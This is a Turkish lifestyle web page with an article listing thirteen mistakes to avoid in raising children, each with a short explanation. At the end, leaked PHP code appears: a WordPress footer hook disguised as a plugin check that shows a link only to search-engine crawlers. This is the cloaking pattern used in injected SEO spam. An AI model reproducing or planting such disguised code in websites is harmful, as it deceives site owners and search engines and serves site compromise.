Sıradaki içerik:

Tatil Sezonunda Taşıma Şirketlerini Zor Günler Bekliyor

e
sv

Çocuğunuzu Yetiştirirken Asla Yapmamanız Gereken 13 Hata

06 Aralık 2020 09:16
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Çocuğunuz ilk doğduğu zaman ufak bir bebektir ve biricik yapmanız gereken standart ihtiyaçlarını karşılamaktır. Ancak yaş ilerlediği ve farklı yaşlara ait farklı gelişim dönemleri başladığı zaman doğru eğitim her ana – baba için öncelikli hale gelir. Çocuk yetiştirme süreci, çocuğunuz kendi ayakları üzerinde duran bir yetişkin olana kadar devam eder, yani oldukça uzun bir süreçtir.

Anne ve baba kendini çocuk psikolojisi konusunda geliştirmiş olsa bile hiç kimse bu konuda profesyonel bir uzman olmadığı için hatalar yapılacaktır. Bu noktada önemli olan sıfır hata yerine minimum hata yapmayı hedeflemektir. Ebeveynler çocuğa ne kadar doğru bir şekilde yaklaşırsa ufak çocuğun ileride daha güçlü ve kendine yeten yetişkin bir fert olma ihtimali de bir o kadar artacaktır. 

Çocuk yetiştirirken yapılmaması gereken hatalar:

Çocuğu görmezden gelmekÇocuğa her istediğini vermekNet kurallar belirlememekEbeveynlerin disiplinsiz olmasıÇocuğu başkalarına benzetmek ve kıyaslamakÇocuğu fazla övmek ya da yermekDuygularını önemsememekHatalarından ders çıkarmasını sağlamamakAnne ya da babayı canavar gibi göstermekÇocuğu motive etmemekÇocuğu suçlamakÇocukla konuşmamakHer şeyi birdenbire fazla kere yine etmek

Çocuğu görmezden gelmek:

utangaç çocuk

Özellikle kreş, anaokulu ya da okul hayatı olmayan ufak yaş grubu çocukların ana ve baba ilgisine düşündüğünüzden daha fazla ihtiyacı vardır. Çocuk bazen fazla sessiz durur ya da hareket etmeden uzun süre oturur ve aslında böyle zamanlarda ilgi ister. Çocuğun bu tip pasif fena davranışlarına ağladığı ve ortalığı birbirine kattığı zamanlardan daha az ilgi gösterirseniz, çocuk ilgi çekmek için daimi hadise çıkarmaya başlayacaktır. 

Çocuğa her istediğini vermek:

şımarık çocuk

Çocuğun istediği şey bir oyuncak, farklı bir yemek ya da televizyonda kendi istediği program olabilir ve istediğini almadığı zaman öfke, ağlama nöbeti geçirebilir. Bu noktada çocuğa sadece susması için istediğini verirseniz bu hal kısa süre içinde bir alışkanlığa dönüşecektir. Her istediğini elde eden bir çocuk, bir şeyler elde etmek için lüzumlu olan becerileri gelişmeden bir yetişkin olacak ve kendi ayakları üzerinde durması her zaman zor olacaktır. 

Net kurallar belirlememek:

anne, çocuk, kural

Tüm yetişkinlerin ortak olarak kabul ettikleri bazı temel kurallar vardır ancak ana ve babası tarafından öğretilmediği sürece çocuklar bu kurallardan habersizdir. Çocuk, müsait olmayan bir davranış yaptığı zaman her seferinde aynı tepkiyi almalı ve bu durumun bir kural olduğunu öğrenmelidir. Ayrıca hem ana hem baba aynı durumda, aynı tepkiyi vermelidir yoksa çocuk, yaptığı eylemin doğru sonucunun hangisi olduğunu bilemez.

Ebeveynlerin disiplinsiz olması:

disiplinsiz aile

Çocuğa doğru bir eğitim vermenin en önemli noktası eğitimcinin yani ana ve babanın disiplinli olması ve bir plan dahilinde hareket etmesidir. Özellikle farklı davranış kalıplarına sahip olan çocukların eğitim sürecinde ana ve babanın hem disipline hem de güçlü bir plana ihtiyacı vardır. Anne ve baba bu konuda birbirine destek olmalı ve plan içindeki rollerini iyi bilmelidirler.

Çocuğu başkalarına benzetmek ve kıyaslamak:

çocuk kıyaslamak

Benzetme ve kıyaslama durumu yalnızca farklı insanlarla değil, aile içinde yapıldığında da çocuk üzerinde olumsuz tesir yaratacaktır. Babası kılıklı, tıpkı annesi, kardeşin gibi efendi olsana ve benzeri daha pek fazla örnek çocuk üzerinde yetersizlik hissi yaratacaktır. Kendisinin özel olmadığını hissedecek, hem çocukluk hem yetişkinlik döneminde sürekli kendini öbür insanlarla kıyaslayacak ve mutsuz olacaktır.

Çocuğu fazla övmek ya da yermek:

yaramaz çocuk

Her şey dozunda olmalıdır. Çocuğunuzu motive etmek amacıyla övmeniz ve ona güzel lakaplar takmanız, en az yermeniz ve ona fena lakaplar takmanız kadar olumsuz tesir yapacaktır. Aslan oğlum, prenses kızım gibi sözlerin sıkça duyulması ile kafa belası, canavar gibi sözlerin sıkça duyulması gelişim sürecinde benzer olumsuz etkiler yapacaktır. Bu nedenle böyle sözleri de dozunda kullanmak gerekiyor. 

Duygularını önemsememek:

ağlayan çocuk

Çocuklar, bazen yetişkinlerin anlamakta zorluk çektiği durumlar sonucu bir anda üzülebilir ve ağlamaya başlayabilirler. Hatta bu hal çığlıklara ve kısa öfke nöbetlerine dönüşebilir. Bu noktada çocuğu yalnızca susturmak için bir şeyler yapmak doğru değildir. Konuşarak duygularını anlamaya çalışmalı ve ona bir sonuç vermelisiniz. Herhangi bir duygu hissettiği zaman yapması gerekenleri ve bir sonucu olduğunu bilmelidir. 

Hatalarından ders çıkarmasını sağlamamak:

sinirli çocuk

Genel olarak ebeveynlerin pek çoğu çocuk bir hata yaptığı zaman onu utandırma ya da cezalandırma eğilimi gösterir. Ancak bu hal çocuğun yaptığı hatayı tekrarlamasını engellemez. Doğru olan davranış çocuğa yaptığı hatayı anlatmak, bir daha böyle bir hal yaşanırsa ne yapacağını öğretmek ve hatasından bir ders çıkarmasını sağlamaktır. Böylece aynı hata bir daha tekrarlanmayacaktır.

Anne ya da babayı canavar gibi göstermek:

kötü ebeveyn

Akşam baban gelince görürsün, annene söyleyeyim bak neler olacak gibi çocuğu hem tehdit etmek hem de kendi ana ve babasından korkmasını sağlayacak söz ve davranışlar çocuk üzerinde direkt olarak olumsuz tesir yapmaktadır. Anne ve babasına bile güvenemeyeceğini gören çocuk, yaptığı eylemleri saklama eğilimi gösterecek ve kendi ailesine bile güvensiz bir yetişkin olacaktır. 

Çocuğu motive etmemek:

baba, çocuk, azarlamak

Pek fazla ana ve baba için doğru eğitim süreci, çocuk yanlış bir davranışta bulunduğu zaman ona karşı yapılan davranış üzerine şekillenir. Ancak hataya verilen cezadan daha önemlisi iyi bir davranışı motive etmektir. Ödevini zamanında yapan, hane işlerine yardım eden, harçlığını hayalindeki oyuncak için biriktiren bir çocuğun yaptığı bu davranış ebeveyn tarafından desteklenmeli ve iyi davranışın tekrarlanması için motive edilmelidir.

Çocuğu suçlamak:

suçlanan çocuk

Daha önce anlattığımız gibi çocuklar, yetişkinlerin arasında üzerinde anlaşılmış olan kural ve davranış kalıplarına hakim değillerdir. Bu nedenle çocuğun yaptığı bir davranış ya da hissettiği duygu sonrası hareketleri yetişkinlere doğru gelmez ve suçlanır. Çocuğu suçlamak, asla bir çözüm değildir. Çocuğu suçlamak yerine yapılan davranışı analiz etmek ve bir daha tekrarlanmaması için neler yapılacağını öğretmek gerekiyor.

Çocukla konuşmamak:

üzgün çocuk

Yetişkin insanlar arasında bile en önemli durumların çözümü için konuşmak ve saygı çerçevesinde tartışmak gerekiyor. Aynı hal çocuklar için de geçerlidir. Ben annenim benim dediğim olacak ya da baba sözü dinle olmaz dedim gibi çocuğun duygu ve isteklerini dinlemeden konunun kestirip atılması, kendine güvensiz ve sosyal becerileri zayıf çocukların yetişmesine sebep olacaktır.

Her şeyi birdenbire fazla kere yine etmek:

sıkılan çocuk

Disipline, plana ve kurallara sahip bir ana ve baba, çocuğun yapmasını istedikleri şeyleri asla birden fazla kere yine etmezler. Odanı topla ya da ödevini yap gibi temel durumlarda bile çocuk istenileni yapmıyor ve sık sık yine edilmesi gerekiyorsa bir noktadan sonra çocuk, ebeveynlerini hiç dinlemeyecektir. Bu nedenle kurallar baştan belirlenmeli ve ilk söylendiği zaman yapmadığı fiil yüzünden çocuk bir sonuç ile karşılaşmalıdır.

Çocuk yetiştirme, son radde uzun ve zorlu bir süreçtir. Bu süreçte hem ebeveynlerin hem de çocuğun yorulduğu dönemler olacaktır ancak doğru eğitim için en azından yapılmaması gereken hataları bilmek ve bunlara özen göstermek bile bu sürecin daha verimli geçmesini sağlayacaktır. 

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');